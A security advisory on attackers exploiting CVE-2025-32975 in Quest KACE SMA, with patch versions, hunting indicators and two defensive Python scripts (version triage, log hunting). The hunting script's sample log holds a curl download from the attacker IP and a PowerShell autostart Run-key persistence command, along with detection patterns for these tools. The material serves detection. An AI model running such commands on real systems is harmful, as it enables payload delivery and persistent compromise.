Corporate networks are facing active exploitation of CVE-2025-32975, a critical authentication bypass vulnerability in the Quest KACE Systems Management Appliance (SMA), a popular platform for IT asset management and software deployment. According to telemetry from Arctic Wolf, malicious activity has been observed since the week of 9 March 2026, primarily against internet-exposed, unpatched KACE SMA instances.
What is CVE-2025-32975 in Quest KACE SMA?
The vulnerability CVE-2025-32975 is rated with the maximum CVSS base score of 10.0, reflecting its severity. It is an authentication bypass issue that allows an attacker to impersonate a legitimate user without valid credentials. In practice, this enables direct takeover of an administrative session and full control of the management appliance.
Once exploited, an attacker can access the KACE SMA web interface as an administrator, modify policies, deploy software and scripts to managed endpoints, and alter configuration across the environment. Because KACE SMA typically has broad reach into servers and workstations, compromise of a single appliance can quickly evolve into enterprise-wide compromise. Quest released patches addressing CVE-2025-32975 in May 2025.
How attackers are exploiting Quest KACE SMA in the wild
Arctic Wolf’s analysis indicates that threat actors are using CVE-2025-32975 to obtain administrative access and then execute remote commands on vulnerable appliances. One observed tactic involves the use of curl to download malicious components from an external server at 216.126.225[.]156, delivering payloads encoded as Base64 strings.
In this context, Base64 encoding is not encryption; it is used to obscure content and simplify transmission of binary data in text form. After decoding, the payloads may consist of scripts, trojan downloaders, or remote administration tools designed to maintain access, move laterally, and expand control across the network.
Post-exploitation: abuse of runkbot.exe and PowerShell for persistence
Following initial access, attackers have been observed creating additional administrator accounts by abusing the runkbot.exe process. This executable is a legitimate background component of the KACE SMA agent, responsible for running scripts and managing software installations on enrolled endpoints. Leveraging built-in service processes makes malicious activity harder to spot because it blends in with normal management operations.
Investigations have also revealed modifications to the Windows Registry via PowerShell scripts. Such registry changes are a common persistence technique, for example, by adding malware to autostart entries or weakening security settings. PowerShell remains a favored tool for many threat actors due to its deep integration with Windows, extensive automation capabilities, and the fact that it is typically allowed in enterprise environments.
Why IT management appliances like Quest KACE SMA are prime targets
Management platforms such as Quest KACE SMA occupy a high-trust position inside corporate infrastructure. They have visibility into large numbers of servers and endpoints and can push software, scripts, and configuration changes at scale. From an attacker’s perspective, compromising such a system provides an ideal “distribution hub” for malware and tools, enabling wide infection with minimal user interaction.
Historical incidents involving other management and monitoring platforms demonstrate this risk clearly: once an attacker gains privileged access to a centralized management tool, they can quickly turn it into an efficient mechanism for ransomware deployment, data exfiltration, or stealthy long‑term access. This is why authentication bypass vulnerabilities with admin takeover in these products routinely receive the highest CVSS scores, and why exposing their admin interfaces or APIs directly to the internet remains a critical misconfiguration.
Security recommendations for Quest KACE SMA customers
Patch vulnerable KACE SMA versions and minimize internet exposure
Administrators should immediately verify that their Quest KACE SMA deployment is running a version that includes the fix for CVE-2025-32975. Quest has addressed the issue in the following releases: 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), 14.1.101 (Patch 4). Any appliance on an earlier build should be upgraded or patched as a matter of urgency.
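A small triage script for checking appliance inventory against the fixed releases listed above (an added example, not Quest's own tooling; the assumption that every later build on the same branch also carries the fix, and that branches not listed are "unverified", is ours):

```python
# Added example, not Quest's own tooling: checks a KACE SMA version string against
# the fixed releases listed above for CVE-2025-32975.
import re

# Fixed build per release branch, from the article. Treating every later build on
# the same branch as fixed, and unlisted branches as unverified, is our assumption.
FIXED_BUILDS = {
    (13, 0): 385,
    (13, 1): 81,
    (13, 2): 183,
    (14, 0): 341,  # 14.0.341 (Patch 5)
    (14, 1): 101,  # 14.1.101 (Patch 4)
}

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)")

def parse_version(text):
    """Return (major, minor, build) from '14.0.341' or '14.0.341 (Patch 5)'."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised KACE SMA version string: {text!r}")
    return tuple(int(x) for x in m.groups())

def assess(version_text):
    """Classify a build as 'patched', 'vulnerable' or 'unverified'.

    'unverified' means the branch is not in the list above (an older branch, or
    one released after these fixes) and must be checked against Quest's guidance.
    """
    major, minor, build = parse_version(version_text)
    fixed = FIXED_BUILDS.get((major, minor))
    if fixed is None:
        return "unverified"
    return "patched" if build >= fixed else "vulnerable"

def triage(inventory):
    """Map {host: version} to {host: status}, vulnerable hosts listed first."""
    order = {"vulnerable": 0, "unverified": 1, "patched": 2}
    results = {host: assess(ver) for host, ver in inventory.items()}
    return dict(sorted(results.items(), key=lambda kv: (order[kv[1]], kv[0])))

if __name__ == "__main__":
    # Constructed sample inventory, not real hosts.
    sample = {"kace-hq": "14.0.340", "kace-lab": "14.1.101 (Patch 4)",
              "kace-eu": "13.2.183", "kace-old": "12.1.170"}
    for host, status in triage(sample).items():
        print(f"{host:9s} {status}")
```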
Equally important is to review the network exposure of KACE SMA. Direct internet access to the web interface or API should be disabled wherever possible, limiting access to internal network segments and, when remote access is required, to VPN-protected connections. Placing KACE SMA in a dedicated, well‑segmented network zone with strict firewall rules can significantly reduce the blast radius if the appliance is ever compromised.
Hunt for compromise and strengthen detection capabilities
Organizations using Quest KACE SMA should conduct targeted log reviews and threat hunting to identify potential compromise. Priority indicators include:
— unexpected logins with administrative accounts;
— creation of new administrator users without corresponding change tickets;
— outbound connections to 216.126.225[.]156 or other unfamiliar external IPs;
— unusual activity involving curl, PowerShell, or the runkbot.exe process.
Enhanced PowerShell logging (including script block and module logging), combined with EDR/XDR solutions, can improve detection of suspicious behavior patterns such as script-based lateral movement or persistence creation. Regular audits of privileged accounts, strict application of the principle of least privilege, robust patch management processes, and network segmentation are key measures to limit the success and impact of similar vulnerabilities in the future.
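The indicators above, turned into a hunting pass over log data (an added example, not Arctic Wolf's or Quest's tooling): it flags admin logins from outside an assumed admin subnet, new administrator accounts, connections to the download server named in the article, the suspect processes, and PowerShell touching autostart registry keys. The key=value line format, the field names and the 10.20.0.0/16 admin subnet are assumptions; adapt the parser to your SIEM's schema.

```python
# Added example, not Arctic Wolf's or Quest's tooling: hunts the indicators the
# article lists over a constructed key=value log feed. The line format, field
# names and the admin subnet are assumptions; adapt the parser to your SIEM.
import ipaddress
import re

KNOWN_C2 = {"216.126.225.156"}  # download server named in the article
SUSPECT_IMAGES = {"curl", "curl.exe", "powershell.exe", "pwsh.exe", "runkbot.exe"}
ADMIN_NETS = [ipaddress.ip_network("10.20.0.0/16")]  # assumed admin subnet
RUN_KEY = re.compile(r"currentversion\\run", re.IGNORECASE)  # autostart keys

def parse_line(line):
    """Parse '<ts> <host> k=v k="v with spaces" ...' into a dict."""
    ts, host, rest = line.split(" ", 2)
    fields = {"ts": ts, "host": host}
    for key, val in re.findall(r'(\w+)=("[^"]*"|\S+)', rest):
        fields[key] = val.strip('"')
    return fields

def hunt(lines):
    """Return (severity, reason, raw_line) for each line matching a rule."""
    hits = []
    for line in lines:
        f = parse_line(line)
        ev = f.get("event")
        if ev == "login" and f.get("role") == "admin":
            src = ipaddress.ip_address(f["src"])
            if not any(src in net for net in ADMIN_NETS):
                hits.append(("medium", "admin login from outside admin subnet", line))
        elif ev == "user_create" and f.get("role") == "admin":
            hits.append(("high", "new administrator account created", line))
        elif ev == "net_connect" and f.get("dst") in KNOWN_C2:
            hits.append(("critical", "connection to known download server", line))
        elif ev == "process":
            image = re.split(r"[\\/]", f.get("image", ""))[-1].lower()
            if RUN_KEY.search(f.get("cmd", "")):
                hits.append(("high", "autostart registry key modified", line))
            elif image in SUSPECT_IMAGES:
                hits.append(("medium", f"suspect process {image}", line))
    return hits

# Constructed sample feed, not real telemetry; only the IP comes from the article.
SAMPLE = [
    "2026-03-10T02:14:07Z kace01 event=login user=admin role=admin src=198.51.100.7",
    "2026-03-10T02:14:30Z kace01 event=user_create user=svc_upd role=admin by=admin",
    '2026-03-10T02:15:02Z kace01 event=process image=/usr/bin/curl cmd="curl http://216.126.225.156/payload"',
    "2026-03-10T02:15:03Z kace01 event=net_connect dst=216.126.225.156 dport=80",
    '2026-03-10T02:20:11Z ws-042 event=process image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmd="Set-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -Name upd -Value C:\\ProgramData\\u.exe"',
    "2026-03-10T09:00:00Z kace01 event=login user=jdoe role=admin src=10.20.5.8",
]
```

hunt(SAMPLE) returns five findings for the sample feed; the last line, an admin login from the assumed admin subnet, is intentionally not flagged.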
The current wave of attacks against Quest KACE SMA illustrates how quickly critical vulnerabilities in IT infrastructure management systems are weaponized by threat actors. Rapid patching, elimination of unnecessary internet exposure, continuous monitoring, and a tested incident response plan are no longer optional recommendations but essential elements of cyber resilience. Organizations that invest in these practices today are far better positioned to prevent the next critical or zero‑day vulnerability from turning into a major security incident.